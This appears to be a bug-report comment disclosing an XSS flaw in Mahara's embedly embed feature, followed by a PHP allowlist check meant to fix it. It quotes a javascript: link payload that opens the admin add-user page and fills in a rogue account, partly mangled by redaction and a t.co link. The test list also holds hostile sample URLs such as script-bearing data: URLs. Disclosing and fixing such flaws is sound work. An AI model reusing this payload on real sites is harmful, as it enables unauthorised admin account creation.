Note: I'm not sure about the 't.co' URL as that might have been converted from Twitter as it was sent via a DM.
---------------------
Things to keep in mind:
- we'd probably need to allow protocol-free URLs too, e.g. allow strings starting with 'http://', 'https://', and '://'
- sanitize the URL
- Alternatively, the sanity check could be done here:
/htdocs/blocktype/externalvideo/embed_services/embedly/embedservice.php#L61
Example exploit:
<a class="embedly-card" href="javascript:{var TestWindow = window.open('../admin/users/add.php','TestWindow','width=800,height=800,left=100,top=50');function fill() {TestWindow.adduser.username.value='badboy';TestWindow.adduser.firstname.value='Bad';TestWindow.adduser.lastname.value='Boy';http://<email address hidden>';TestWindow.adduser.password.value='Secret+12345';https://t.co/f2YTjI3B9B();}TestWindow.addEventListener('load',fill); }">open the gate</a>
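The exploit above works because the href handed to the embed card is accepted as-is, so a "javascript:" URL runs in the opener's origin. The server-side check the comment asks for (the author points at embedservice.php for its location) has to decide what a URL is allowed to look like before anything is stored or rendered. The following is an added example of such an allowlist check, written for this page and not taken from Mahara's code base; the function name, the optional host allowlist and the sample URLs are assumptions. It accepts http, https and protocol-relative "//host/..." URLs (the common protocol-free form) and rejects everything else, including scheme names disguised with whitespace or control characters, relative paths such as "../admin/users/add.php", and URLs carrying credentials in the authority part.

```php
<?php
// Added example, not Mahara's code. Assumed helper: is_safe_embed_url().
// Returns true only for absolute http/https URLs (or protocol-relative
// "//host/path" URLs) whose host is, when an allowlist is given, on it.
function is_safe_embed_url(string $url, array $allowed_hosts = array()): bool {
    // Browsers ignore ASCII control characters and whitespace inside a URL,
    // so strip them first; otherwise "java\tscript:" would pass a naive
    // scheme check and still execute in the browser.
    $normalised = preg_replace('/[\x00-\x20\x7f]+/', '', $url);
    if ($normalised === null || $normalised === '') {
        return false;
    }

    // Protocol-relative URL: treat it as https for the purpose of the check.
    if (substr($normalised, 0, 2) === '//') {
        $normalised = 'https:' . $normalised;
    }

    $parts = parse_url($normalised);
    // No scheme or no host means a relative path ("../admin/users/add.php")
    // or a non-hierarchical scheme such as javascript: or data:.
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }

    // Scheme allowlist; compare case-insensitively ("JaVaScRiPt:" is valid).
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, array('http', 'https'), true)) {
        return false;
    }

    // "https://trusted.example@evil.example/" is a classic way to disguise
    // the real host; embed URLs never need credentials, so refuse them.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;
    }

    // Optional host allowlist for a service that only embeds known providers.
    if ($allowed_hosts !== array()) {
        return in_array(strtolower($parts['host']), $allowed_hosts, true);
    }
    return true;
}

// Constructed sample inputs (not from the bug report) with the expected verdict.
$samples = array(
    'https://www.youtube.com/watch?v=abc123'        => true,
    'http://example.com/video/1'                    => true,
    '//player.vimeo.com/video/123'                  => true,  // protocol-free
    'javascript:alert(1)'                           => false,
    "java\tscript:alert(1)"                         => false, // control char
    'JaVaScRiPt:alert(1)'                           => false, // mixed case
    'data:text/html,<script>alert(1)</script>'      => false,
    '../admin/users/add.php'                        => false, // relative path
    'https://user:pw@example.com/'                  => false, // credentials
);

foreach ($samples as $url => $expected) {
    $verdict = is_safe_embed_url($url);
    printf("%-45s %s\n", addcslashes($url, "\0..\37"),
           $verdict === $expected ? 'ok' : 'MISMATCH');
}

// With a host allowlist only the listed providers get through.
var_dump(is_safe_embed_url('https://www.youtube.com/watch?v=abc123',
                           array('www.youtube.com', 'player.vimeo.com'))); // bool(true)
var_dump(is_safe_embed_url('https://attacker.example/x',
                           array('www.youtube.com', 'player.vimeo.com'))); // bool(false)
```

Whatever passes this check should still be HTML-escaped when it is written into the href attribute, and the check belongs on the server side at the point where the URL is first accepted, not only in the browser, since the attacker controls the request.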